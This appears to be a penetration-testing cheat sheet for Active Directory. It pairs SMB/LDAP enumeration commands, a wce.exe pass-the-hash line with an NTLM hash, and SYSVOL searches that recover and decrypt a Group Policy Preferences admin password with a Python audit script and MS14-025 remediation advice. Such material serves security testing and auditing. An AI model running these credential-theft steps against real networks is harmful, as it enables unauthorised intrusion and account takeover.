nmap --script smb-enum-shares.nse -p445 IP
enum4linux
Browse shares for passwords, and look on the domain controller for passwords stored in Group Policy Preferences (GPP), which can be decrypted:
C:\> wce.exe -s john-pc:securus:aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
C:\> findstr /S cpassword \\dc1.securus.corp.com\sysvol\*.xml
\\192.168.122.55\sysvol\securus.corp.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml: ="" description="" cpassword="1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="1" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
C:\> ruby gppdecrypt.rb 1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs
1q2w3e4r5t
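An added audit script (not from the original post) that does what the findstr line above does, but parses each SYSVOL XML file and reports which element and account carries a cpassword; the sample XML is constructed and its cpassword value is a placeholder. It generalizes beyond Groups.xml to the other preference types that can embed a cpassword.

```python
import pathlib
import xml.etree.ElementTree as ET

# Constructed sample modelled on a GPP Groups.xml; the cpassword value is a
# placeholder, not a real ciphertext (assumption for this example).
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="PLACEHOLDER_CPASSWORD_VALUE" changeLogon="0" noChange="0"
      neverExpires="0" acctDisabled="1" subAuthority="RID_ADMIN"
      userName="Administrator (built-in)"/>
  </User>
</Groups>
"""

def find_cpasswords(xml_data):
    """Return (element_tag, account, cpassword) for every element with a non-empty cpassword."""
    hits = []
    for elem in ET.fromstring(xml_data).iter():
        cp = elem.attrib.get("cpassword")
        if not cp:
            continue  # attribute absent or empty: no stored password
        # Groups.xml keeps the account in userName; Services, ScheduledTasks,
        # DataSources and Drives use accountName / runAs / userName instead.
        who = next((elem.attrib[k] for k in ("userName", "accountName", "runAs")
                    if k in elem.attrib), "")
        hits.append((elem.tag, who, cp))
    return hits

def scan_sysvol(sysvol_path):
    """Walk a SYSVOL copy and list (file, element, account) for every cpassword found."""
    findings = []
    for path in pathlib.Path(sysvol_path).rglob("*.xml"):
        try:
            data = path.read_bytes()  # bytes keep ET happy with the UTF-8 BOM GPP writes
        except OSError:
            continue
        if b"cpassword" not in data:
            continue  # cheap pre-filter, same idea as findstr
        try:
            for tag, who, _ in find_cpasswords(data):
                findings.append((str(path), tag, who))
        except ET.ParseError:
            findings.append((str(path), "UNPARSEABLE", ""))  # still contains the attribute
    return findings
```

Run it against a read-only copy of SYSVOL; MS14-025 stopped GPP from writing new cpassword values but does not remove existing ones, so stale entries have to be found and deleted by hand.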
=============================================================================
LDAP ports open TCP 389
ldapsearch -x -h host_or_domain.local -s base namingcontexts
Shows the permissions (ACLs) of files on a Windows share in the domain:
smbcacls -N '//IP_or_HOSTNAME/share' /Users